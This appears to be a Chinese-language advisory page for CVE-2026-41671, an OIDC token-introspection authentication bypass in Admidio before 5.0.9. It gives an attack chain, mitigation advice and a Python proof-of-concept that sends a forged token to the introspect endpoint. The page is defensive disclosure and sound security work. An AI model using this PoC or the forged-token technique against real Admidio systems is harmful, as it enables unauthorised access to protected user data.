CVE-2026-41671 CVSS 6.8 中危

CVE-2026-41671 Admidio OIDC认证绕过漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41671

漏洞类型

认证绕过

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Admidio

漏洞概述

Admidio是一个开源用户管理解决方案。在5.0.9版本之前，其OIDC令牌内省端点存在严重逻辑缺陷。该端点未对调用方进行身份验证，也未对提交的令牌进行任何有效性验证，无论令牌是否有效、过期或伪造，均返回active状态。依赖此端点的资源服务器会接受所有请求，导致认证机制完全失效。此外，令牌撤销端点也存在虚假响应问题，无法有效吊销凭证。

技术细节

漏洞核心在于Admidio对OIDC规范实现的缺失。在/modules/sso/index.php/oidc/introspect接口中，后端代码缺少对Token的签名校验、数据库查询比对以及过期时间判断逻辑。攻击者无需持有合法的JWT或Access Token，仅向该端点发送请求（甚至Token参数为空），服务端即无条件返回激活状态。这破坏了OAuth 2.0 / OIDC的安全模型，允许攻击者利用伪造的Token通过资源服务器的验证。同时，/oidc/revoke接口仅返回成功JSON但未执行数据库更新操作，导致已泄露凭证无法被及时作废。

攻击链分析

STEP 1

侦查

攻击者识别目标系统使用Admidio，并定位到OIDC相关的内省端点路径。

STEP 2

漏洞利用

攻击者向`/modules/sso/index.php/oidc/introspect`端点发送POST请求，请求中携带伪造、过期或空的Token。

STEP 3

认证绕过

由于服务端未进行验证，返回`{"active": true}`，攻击者利用该响应欺骗依赖此端点的资源服务器。

STEP 4

非法访问

攻击者使用伪造的Token成功访问受保护的资源，获取敏感数据或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_poc(url):
    # The vulnerable endpoint path
    target_url = f"{url}/modules/sso/index.php/oidc/introspect"
    
    # Use a completely invalid/fabricated token
    fake_token = "attacker_fabricated_token_payload"
    
    # Prepare the payload
    data = {
        "token": fake_token
    }
    
    try:
        response = requests.post(target_url, data=data, timeout=10)
        
        if response.status_code == 200:
            json_response = response.json()
            # Check if the server claims the fake token is active
            if json_response.get("active") is True:
                print("[+] Vulnerability Confirmed! The endpoint accepts invalid tokens.")
                print(f"[+] Response: {json_response}")
            else:
                print("[-] Token returned as inactive. System might be patched.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except Exception as e:
        print(f"[!] Error during request: {e}")

if __name__ == "__main__":
    target = "http://localhost/admidio" # Replace with actual target
    check_poc(target)

影响范围

Admidio < 5.0.9

防御指南

临时缓解措施

建议立即限制对/modules/sso/index.php/oidc/introspect端点的网络访问，仅允许受信任的资源服务器IP地址调用。如果业务允许，可临时禁用SSO模块功能以降低风险，直至完成版本升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表